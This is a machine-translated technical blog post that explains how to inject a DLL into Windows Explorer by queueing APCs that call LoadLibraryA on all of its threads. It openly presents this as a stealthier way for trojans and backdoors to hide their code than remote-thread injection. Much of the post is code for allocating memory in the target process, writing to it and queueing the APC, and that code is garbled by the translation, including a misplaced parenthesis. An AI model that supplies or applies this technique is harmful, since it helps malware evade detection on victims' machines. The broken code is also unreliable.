Brute force injection Explorer

Brute force injection Explorer
Jfpan20000@sina.com (pjf)
The most natural way to inject your own code into a running process is to use createremotethread,
Nowadays, remote thread injection is a flood of disasters. The same tool monitors remote thread injection and prevents remote thread injection.
The injection to explorer or IE when a trojan or backdoor is started is like writing it on your face.
"I am a thief.
To hide user-mode code in other processes more implicitly, you should conceal your own line in the injection process.
Yes. The following describes a simple but violent method. The example is to add
Load your own DLL.
First, we mentioned an API: queueuserapc.

DWORD queueuserapc (
Papcfunc pfnapc, // APC Function
Handle hthread, // handle to thread
Ulong_ptr dwdata // APC function parameter
;

Everyone should be familiar with this API. It is directly transferred to the System Service ntqueueapcthread to benefit
Use keinsertqueueapc to insert an APC object to the APC queue of the given target thread. If kideliverapc
It's okay to successfully construct the APC environment and execute our code. Unfortunately, it's not that smooth,
Whether or not userapcpending in apcstate is true has an important impact. The result is that you will always wait until the flowers have thanked you.
Your code is still not executed. The core State is often not a problem. You can assign values by yourself, but the user State
The program is not easy to do. What should I do? In fact, the simplest thing is to let the system do it without doing it well.
In fact, the system will set userapcpending
True (when kedelayexecutionthread/kewaitformultipleobjects/kewaitforsingleobject
It is possible to use testforalertpending and ketestalertthread.
), The simplest example is to insert the APC code after the target thread calls sleepex (***, true ).
OK.
Fortunately, in the explorer process, there is always a thread that fits us, so it is the simplest but not
The best way is to enumerate all threads in Explorer and insert all threads as follows:

......
DWORD ret;
Char * dllname = "C: // mydll. dll ";
Int Len = strlen (dllname) + 1;
Pvoid Param = virtualallocex (hprocess, null, Len,
Mem_commit | mem_top_down,
Page_readwrite );
If (Param! = NULL)
{
If (writeprocessmemory (hprocess, Param,
(Lpvoid) dllname, Len, & RET ))
{
For (DWORD p = 0; P <numberofthreads; P ++)
{
Hthread = openthread (thread_all_access, 0, threadid [p]);
If (hthread! = 0)
{
Injectdll (hprocess, hthread, (DWORD) PARAM );
Closehandle (hthread );
}
}
}
......

Injectdll:
Void injectdll (handle hprocess, handle hthread, dword param)
{
Queueuserapc (
(Papcfunc) getprocaddress (getmodulehandle ("kernel32.dll", "loadlibrarya ",
Hthread,
(DWORD) Param
;
}